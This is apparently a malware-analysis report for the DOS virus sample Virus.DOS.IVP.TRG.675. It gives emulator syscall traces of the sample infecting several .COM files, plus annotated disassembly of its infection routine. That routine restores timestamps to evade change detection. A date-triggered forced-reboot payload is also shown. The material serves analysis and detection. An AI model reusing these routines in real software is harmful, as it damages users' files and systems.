Sample viewer

vx.netlux.org/Virus.DOS.IVP.TRG.675


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:58.792969898Z 26 PC: 12c4f | Set disk transfer address
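2018-12-17T22:35:58.794651204Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: vector 36 decimal is 0x24, the DOS critical-error handler (INT 24h); 'Set random record number' is the name of INT 21h function 24h, so the AKA label is a lookup mismatch]
2018-12-17T22:35:58.795674163Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: same vector 0x24; the AKA caveat on the previous line applies]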
2018-12-17T22:35:58.796769253Z 71 PC: 12aaa | Get current directory
2018-12-17T22:35:58.799995465Z 78 PC: 12b32 | Find first file
2018-12-17T22:35:58.80566737Z 78 PC: 12b32 | Find first file
2018-12-17T22:35:58.816105148Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:58.828019239Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.834195887Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.835895444Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.85256228Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:58.859101318Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.861736997Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.86373892Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Emulator window at the return from INT 21h AH=2Ch (Get time; DH = seconds).
; It shows the tail of the per-file infection routine (0x12c1b-0x12c41) and two
; small helpers (0x12c42 seek, 0x12c4b set-DTA, cut off). The cmp on the log
; line above tests DH == 0.
; Defender view: this code puts the host file's saved time/date and attribute
; byte back, so timestamp- or attribute-based change detection will not flag the
; file; content or size comparison is needed (the trace shows a 3-byte and a
; 675-byte write per host).
0x12c1e: je 0x12c17                         ; seconds == 0: branch back to 0x12c17 (before this window; presumably re-issues Get time until DH != 0)
0x12c20: mov byte ptr [bp + 0x3a5], dh      ; store the non-zero seconds byte in the body at bp+0x3a5 (looks like a per-copy key/seed; its use is outside this window)
0x12c24: call 0x12c9d                       ; routine not shown; the next logged call is the 675-byte write at PC 12cf9, i.e. inside it
0x12c27: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date/time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]      ; CX = saved time word
0x12c2e: mov dx, word ptr [bp + 0x41a]      ; DX = saved date word; 0x417/0x418/0x41a fit the attribute/time/date fields of a find-first DTA at bp+0x402 (inferred, confirm)
0x12c32: int 0x21                           ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e                       ; INT 21h AH=3Eh: close handle (the handle register is set outside this window)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]      ; CX = saved attribute byte
0x12c3e: call 0x12c5a                       ; helper not shown; the trace logs "Get or set file attributes" at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42                       ; helper: INT 21h AH=42h move file pointer; AL (origin) is set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx                         ; offset CX:DX = 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a                       ; start of the set-DTA helper (INT 21h AH=1Ah); the rest is past the window
2018-12-17T22:35:58.8662493Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:58.874840628Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:58.87743282Z 62 PC: 12c38 | Close file
2018-12-17T22:35:58.88503878Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.891363417Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:58.895039455Z 61 PC: 12c58 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:58.901423829Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.905569979Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.907286917Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.917771637Z 61 PC: 12c58 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:58.924197475Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.927298181Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.928731077Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:58.931055136Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:58.939517123Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:58.940903827Z 62 PC: 12c38 | Close file
2018-12-17T22:35:58.948265532Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.959349751Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:58.962007048Z 61 PC: 12c58 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:58.968355294Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:58.974830278Z 62 PC: 12b51 | Close file
2018-12-17T22:35:58.976631829Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:58.986338818Z 61 PC: 12c58 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:58.993001653Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:58.997863298Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:58.999217531Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.001805376Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:59.010644592Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.011695658Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.016561527Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.024800199Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.026463099Z 61 PC: 12c58 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:59.030568359Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:59.034951554Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.03673916Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.046465208Z 61 PC: 12c58 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:59.053433277Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:59.05635625Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.057592934Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.060328716Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-17T22:35:59.068480756Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.069813896Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.077705125Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.089919864Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.092338597Z 61 PC: 12c58 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:35:59.099196326Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:59.105175033Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.106837809Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.112486318Z 61 PC: 12c58 | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:35:59.116937237Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.119921648Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.121658929Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.124440785Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.144622176Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.146492385Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.148114297Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.152892676Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.157467537Z 61 PC: 12c58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:59.163799356Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.169875565Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.172517704Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.178885437Z 61 PC: 12c58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:59.182953599Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.185053302Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.186029711Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.188207869Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.195493582Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.197066327Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.204796236Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.217229696Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.221608405Z 61 PC: 12c58 | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:59.227039899Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.231427564Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.232682227Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.238998665Z 61 PC: 12c58 | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:59.243575503Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:59.246294536Z 66 PC: 12c4a | Move file pointer
2018-12-17T22:35:59.247705306Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-17T22:35:59.249678767Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 2)
2018-12-17T22:35:59.255076725Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:35:59.256456342Z 62 PC: 12c38 | Close file
2018-12-17T22:35:59.264253754Z 67 PC: 12c63 | Get or set file attributes
2018-12-17T22:35:59.273726731Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.276053145Z 61 PC: 12c58 | Open file (Filename = 'TEST.COM')
2018-12-17T22:35:59.287766955Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:59.293912019Z 62 PC: 12b51 | Close file
2018-12-17T22:35:59.29552926Z 79 PC: 12b32 | Find next file
2018-12-17T22:35:59.298098543Z 59 PC: 12ac0 | Change current directory
2018-12-17T22:35:59.302013295Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Emulator window at the return from INT 21h AH=2Ah (Get date: AL = day of week
; with 0 = Sunday, DH = month, DL = day). 0x12ac6-0x12adf is a date-triggered
; payload (forced restart); 0x12ae0 onward is clean-up: restore the INT 24h
; vector, the working directory and the DTA. The cmp on the log line above tests
; AL == 4 (Thursday).
0x12ac8: jne 0x12ae0                        ; not Thursday: skip the payload. In this run it was skipped (next logged call is Set interrupt vector at PC 12ae9)
0x12aca: cmp dh, 0xe                        ; DH is the month (1-12) from Get date, so "above 14" cannot hold
0x12acd: ja 0x12ae0                         ; never taken as written; a day-of-month test (DL) may have been intended (unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                         ; DS = 0040h, the BIOS data area
0x12ad4: mov word ptr [0x72], 0             ; 0040:0072 reset flag cleared (not the 1234h warm-boot value)
0x12ada: ljmp 0xffff:0                      ; far jump to the x86 reset entry FFFF:0000, so the machine restarts
0x12adf: retf                               ; not reached after the far jump
0x12ae0: mov ax, 0x2524                     ; INT 21h AH=25h set vector, AL=24h (decimal 36): the DOS critical-error handler. The log's "AKA 'Set random record number'" is the name of INT 21h function 24h, not of this interrupt
0x12ae3: lds dx, ptr [bp + 0x446]           ; DS:DX = far pointer stored at bp+0x446 (presumably the handler saved by the Get interrupt vector call at the start of the trace)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds                             ; DS = CS again, since lds overwrote DS
0x12aeb: lea dx, word ptr [bp + 0x3c2]      ; DS:DX = path buffer at bp+0x3c2 (presumably filled by the earlier Get current directory call)
0x12aef: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                       ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b                       ; set-DTA helper (the trace logs Set disk transfer address at PC 12c4f)
0x12af9: cmp sp, 0x4b50                     ; window ends here; the purpose of this comparison is not visible
2018-12-17T22:35:59.303982064Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:59.305705801Z 59 PC: 12af3 | Change current directory
2018-12-17T22:35:59.307251624Z 26 PC: 12c4f | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.88786344Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.890356176Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.891805387Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.893194968Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.89722716Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.903055047Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.9110957Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.918676661Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.925366831Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.927475238Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.951680142Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.962698267Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.965599537Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.967324262Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Emulator window at the return from INT 21h AH=2Ch (Get time; DH = seconds):
; tail of the per-file infection routine (0x12c1b-0x12c41) plus two helpers
; (0x12c42 seek, 0x12c4b set-DTA, cut off). The cmp on the log line above tests
; DH == 0. The host's saved time/date and attribute byte are put back here, so
; timestamp-based change detection will not flag the modified file.
0x12c1e: je 0x12c17                         ; seconds == 0: branch back to 0x12c17 (before this window; presumably re-issues Get time until DH != 0)
0x12c20: mov byte ptr [bp + 0x3a5], dh      ; store the non-zero seconds byte at bp+0x3a5 (looks like a per-copy key/seed; its use is outside this window)
0x12c24: call 0x12c9d                       ; routine not shown; the next logged call is the 675-byte write at PC 12cf9, i.e. inside it
0x12c27: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date/time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]      ; CX = saved time word
0x12c2e: mov dx, word ptr [bp + 0x41a]      ; DX = saved date word; offsets fit a find-first DTA at bp+0x402 (inferred, confirm)
0x12c32: int 0x21                           ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e                       ; INT 21h AH=3Eh: close handle (the handle register is set outside this window)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]      ; CX = saved attribute byte
0x12c3e: call 0x12c5a                       ; helper not shown; the trace logs "Get or set file attributes" at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42                       ; helper: INT 21h AH=42h move file pointer; AL (origin) is set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx                         ; offset CX:DX = 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a                       ; start of the set-DTA helper (INT 21h AH=1Ah); the rest is past the window
2018-12-25T11:59:42.970995164Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.979746367Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.981617116Z 62 PC: 12c38 | Close file
2018-12-25T11:59:42.99063798Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.0011378Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.004091633Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.011707205Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.017982837Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.019757482Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.030904577Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.037399773Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.040143956Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.043003275Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.045580442Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.053845418Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.056122989Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.0637151Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.072615761Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.075398394Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.082150993Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.088695096Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.090674995Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.101435835Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.107882932Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.110492612Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.11294717Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.115893532Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.124729631Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.127490677Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.137099159Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.14677342Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.149759729Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.157354223Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.163948349Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.167118484Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.178014183Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.190345591Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.197817623Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.199958056Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.202733017Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.211038497Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.213987128Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.221840889Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.22978757Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.232492121Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.236596796Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.240589092Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.242671608Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.246922409Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.253083985Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.255853482Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.257073022Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.258780439Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.266956213Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.268104885Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.269538555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.272778391Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.276665283Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.280529604Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.285079861Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.286726757Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.29994626Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.307413767Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.310335893Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.312030988Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.3154903Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.325467317Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.326661721Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.332928729Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.339045715Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.341514647Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.348237148Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.356625317Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.358647433Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.36857853Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.380069497Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.386754548Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.388192473Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.390833563Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.399275601Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.400953842Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.4064698Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.412986527Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.415218098Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.419611595Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.42373982Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.425115664Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.427163236Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.42976366Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Emulator window at the return from INT 21h AH=2Ah (Get date: AL = day of week
; with 0 = Sunday, DH = month, DL = day). 0x12ac6-0x12adf is a date-triggered
; payload (forced restart); 0x12ae0 onward restores the INT 24h vector, the
; working directory and the DTA. The cmp on the log line above tests AL == 4
; (Thursday).
0x12ac8: jne 0x12ae0                        ; not Thursday: skip the payload. In this run it was skipped (next logged call is Set interrupt vector at PC 12ae9)
0x12aca: cmp dh, 0xe                        ; DH is the month (1-12) from Get date, so "above 14" cannot hold
0x12acd: ja 0x12ae0                         ; never taken as written; a day-of-month test (DL) may have been intended (unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                         ; DS = 0040h, the BIOS data area
0x12ad4: mov word ptr [0x72], 0             ; 0040:0072 reset flag cleared (not the 1234h warm-boot value)
0x12ada: ljmp 0xffff:0                      ; far jump to the x86 reset entry FFFF:0000, so the machine restarts
0x12adf: retf                               ; not reached after the far jump
0x12ae0: mov ax, 0x2524                     ; INT 21h AH=25h set vector, AL=24h (decimal 36): the DOS critical-error handler. The log's "AKA 'Set random record number'" is the name of INT 21h function 24h, not of this interrupt
0x12ae3: lds dx, ptr [bp + 0x446]           ; DS:DX = far pointer stored at bp+0x446 (presumably the handler saved by the Get interrupt vector call at the start of the trace)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds                             ; DS = CS again, since lds overwrote DS
0x12aeb: lea dx, word ptr [bp + 0x3c2]      ; DS:DX = path buffer at bp+0x3c2 (presumably filled by the earlier Get current directory call)
0x12aef: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                       ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b                       ; set-DTA helper (the trace logs Set disk transfer address at PC 12c4f)
0x12af9: cmp sp, 0x4b50                     ; window ends here; the purpose of this comparison is not visible
2018-12-25T11:59:43.431519973Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.432819955Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.434104469Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.895882053Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.898950977Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
